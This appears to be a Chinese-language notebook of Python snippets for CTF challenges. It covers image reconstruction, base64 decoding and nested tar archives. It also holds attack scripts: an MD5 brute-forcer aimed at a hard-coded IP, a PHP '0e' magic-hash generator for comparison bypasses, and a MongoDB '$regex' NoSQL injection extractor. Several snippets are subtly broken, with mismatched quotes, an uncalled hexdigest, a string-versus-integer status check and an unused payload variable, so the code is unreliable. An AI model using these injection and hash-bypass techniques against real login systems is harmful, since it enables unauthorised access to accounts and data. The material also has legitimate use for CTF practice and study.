1.利用像素点还原图片。
1 from PIL import Image 2 import re 3 if __name__ == '__main__': 4 x = 887 //将像素点个数进行分解,可以确定图片的长宽 5 y = 111 6 i = 0 7 j = 0 8 9 c = Image.new("RGB", (x,y)) 10 file_object = open('ce.txt') //ce.txt中保存着像素点的坐标 11 12 for i in range(0, x): 13 for j in range(0, y): 14 line = file_object.next() //每次读取一个像素点 15 lst = line.split(",") //lst生成一个元组 16 c.putpixel((i, j), (int(lst[0]), int(lst[1]), int(lst[2]))) 17 18 c.show() 19 c.save("c.png")
2.py requests方法的利用以及利用正则匹配查找文本暴力破解md5值。
1 #coding : utf8 2 import requests 3 import re 4 import hashlib 5 import itertools 6 s = requests.session() //建立一个session对话 7 url = "http://106.75.67.214:2050/?pass=bee7a613a8fa4f2f" 8 data = {'PHPSESSID':'6h7b4caq8bo41i3m5fg2983cq5'} 9 content = s.get(url=url,data=data) 10 target = re.findall("sh">(.*)<",content.text) 11 target = target[0] 12 poc = re.findall("code">(.*)<",content.text) 13 str1 = poc[0] 14 a = [''.join(x) for x in itertools.permutations(str1, 9)] //join方法是通过指定的字符串来连接序列元素从而构成新字符串,permutations用来生成无重复字符的元组 15 for i in range(0,len(a)): 16 final = hashlib.md5(a[i]) 17 if final.hexdigest() == target: 18 flag = s.get(url="http://106.75.67.214:2050/?code="+a[i]) 19 print flag.content 20 print flag.headers
3.利用py将base64编码的字符串还原成图片
1 import os,base64 2 strs='''''sdasdas==''' //已经编码的base64字符串 3 4 imgdata=base64.b64decode(strs) 5 file=open('1.jpg','wb') 6 file.write(imgdata) 7 file.close()
4.生成0e哈希值:
1 #coding:utf-8 2 import hashlib 3 import itertools 4 def go(): 5 payload = [c for c in "qwertyuioplkjhgfdsazxcvbnm123654789"] 6 i = 0 7 print payload 8 for j in itertools.product(payload,repeat=30): #repeat参数指定长度 9 payloads = "".join(j) 10 #print pow 11 #i = i+ 1 12 #if i == 10: 13 # break 14 str1 = hashlib.md5(payloads).hexdigest + "SALT" 15 str2 = hashlib.md5(str1) 16 if (str2[0]=="0") & (str2[1]=="e") & (str2[2:].isdigit()): 17 print payloads 18 go()
5.mongodb基于正则注入:
1 #coding:utf-8 2 import requests 3 import string 4 # print string.ascii_letters 5 # print string.digits 6 flag = "c1ctf{" 7 payload = string.ascii_letters + string.digits 8 9 url = "http://xx.x.x.x/index.php?" 10 restsrt = True 11 while restsrt: 12 restsrt = False 13 for i in payload: 14 payloads = flag + i 15 post_data = {"username":"admin","passwd[$regex]":flag+".*"} 16 #post_data = {"username":"admin","passwd[$regex]":"^"+flag} 17 r = requests.get(url = url,data = post_data,allow_redirects = False) 18 if r.status_code == "302": 19 print payloads 20 flag = flag + i 21 restsrt =True 22 if i == "}": 23 exit(0) 24 break 25
6.多次压缩打包
1 #coding:utf-8 2 import tarfile 3 for i in range(1,2): 4 tfile = tarfile.open("shell0.tar.gz","w:gz") #打包压缩 5 tfile.add("flag.py") 6 tfile.close() 7 8 for i in range(1,300): 9 tfile = tarfile.open("shell"+str(i)+".tar.gz","w:gz") 10 tfile.add("1.php") 11 tfile.add("shell"+str(i-1)+".tar.gz") 12 tfile.close()
7.多次解压:
1 #coding:utf-8 2 import tarfile 3 for i in range(1,300)[::-1]: 4 file = tarfile.open("shell"+str(i)+"tar.gz") 5 file.extractall() 6 file.close()